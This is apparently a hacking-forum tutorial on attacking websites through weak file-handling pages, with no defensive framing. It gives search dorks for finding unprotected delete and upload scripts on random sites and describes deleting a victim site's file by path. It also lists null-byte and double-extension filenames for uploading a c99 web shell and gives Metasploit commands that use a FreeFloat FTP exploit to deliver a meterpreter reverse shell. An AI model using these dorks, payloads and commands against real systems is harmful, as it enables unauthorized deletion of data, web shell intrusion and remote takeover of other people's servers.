[Tutorial] Arbitrary File Handling

[The High Roller]

 

 

Introduction

 

Let's start off with the definition. An arbitrary file is any file on a specific server or system. Basically, the arbitrary file is a file that allows you to modify everything on a system. For example, if you got access to a particular website part of a shared server and you manage to root it, the files from the "box" are arbitrary - those on the site itself are not.

 

Now, we can have only a limited number of actions handling arbitrary files. Those are the three following:

 

[*] Arbitrary File Deletion

[*] Arbitrary File Overwriting

[*] Arbitrary File Uploading

 

Arbitrary File Deletion

 

Such method is most usually implemented on websites that lack directory access permissions or do not have any at all. In that case, the hacker can easily directly access the page for file deletion. It is most usually used for random websites, since exploring a targeted website could take quite a lot of time in order to find the path (if, of course, you don't already have the server-side files).

 

I've posted some dorks for arbitrary file deletion below:

 

inurl:"delete.php?file=" ext:php
inurl:"delete?filename=" ext:php
inurl:"delete.aspx?file=" ext:php
inurl:"action=delete?file=" ext:php

 

Let's say, we've found a website

 

 

We can see in the URL the directory of ../delete.php?file=

In our case the target for deletion is a person's information board. It is just encoded in Base64 for some reason and resolves to the following string:

 

/www/egypt3/data/peop/Selvia,+John+and+Lisa/phone1

 

We may use this parameter to delete any file on the server that is hosted on this particular website as long as we are aware of the full path or manage to exploit a directory disclosure vulnerability.

 

Arbitrary File Upload

 

Get about some dork and find an uploading script.

 

inurl:"upload.php?file=" ext:php
inurl:"upload?filename=" ext:php
inurl:"upload.aspx?file=" ext:php
inurl:"action=upload?file=" ext:php

 

This is how my target looks like. A simple upload page (possibly without any filtration upon user input).

 

 

Try and upload your shell directly. If not successful, spoof the extension to one of these using the null byte:

 

shell.php;.jpg
shell.php..jpg
shell.php.jpg;
shell.php.jpg:;
shell.php.jpg%;
shell.php.jpg%00
shell.php%00.jpg
shell.php.jpg;%00
shell.php.jpg%00:;

 

and upon uploading, tamper the POST request with Tamper Data (this has been covered on a lot of tutorials, and you could really easily search for it rather than me explaining it over and over again) so as to change the extension back to what it really is (.php).

 

 

Whoops, we've got our c99 uploaded on their server. If that method of uploading did not work for you, try using a binder and spoof the extension properly.

 

FreeFloat FTP

 

I decided to put up a basic example of a windows exploitation through Metasploit using a public exploit. We gonna use FreeFloat FTP exploit to upload an Arbitrary File on a server. The exploit usage is the following:

 

This module abuses multiple issues in FreeFloat: 1. No credential is actually needed to login; 2. User's default path is in C:\, and this cannot be changed; 3. User can write to anywhere on the server's file system. As a result of these poor implementations, a malicious user can just log in and then upload files, and let WMI (Management Instrumentation service) to execute the payload uploaded.

 

$ msfconsole

msf > use exploit/windows/ftp/freefloatftp_wbem
msf exploit(freefloatftp_wbem) > show payloads
msf exploit(freefloatftp_wbem) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(freefloatftp_wbem) > set LHOST [MY IP ADDRESS]
msf exploit(freefloatftp_wbem) > set RHOST [TARGET IP]
msf exploit(freefloatftp_wbem) > exploit

 

Set/Define the payload

 

 

Define the localhost [LHOST]. You can view your IP address with ifconfig under your network interface (most usually eth1), next to inet addr.

 

 

Define the Remote Host [RHOST]. Just the IP address of the windows victim machine.

 

 

Now type

exploit

(how ironic) and the payload should be delivered successfully.

 

That's all about Arbitrary Files I managed to think of. Leave a comment and hope you learnt something! :pirate: